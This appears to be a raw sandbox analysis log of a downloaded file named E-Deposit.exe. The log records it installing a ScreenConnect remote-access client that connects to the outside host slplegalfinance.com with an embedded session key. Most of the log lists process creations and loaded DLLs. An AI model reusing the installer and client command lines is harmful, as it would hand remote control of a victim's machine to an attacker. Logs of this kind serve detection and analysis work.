Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: unknownProcess created: C:\Users\user\Downloads\E-Deposit.exe "C:\Users\user\Downloads\E-Deposit.exe"
                      Source: unknownProcess created: C:\Users\user\Downloads\E-Deposit.exe "C:\Users\user\Downloads\E-Deposit.exe"
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User"
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: wldp.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: amsi.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: userenv.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: profapi.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: version.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: propsys.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: edputil.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: netutils.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: slc.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: sppc.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Downloads\E-Deposit.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: dpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Section loaded: gpapi.dll
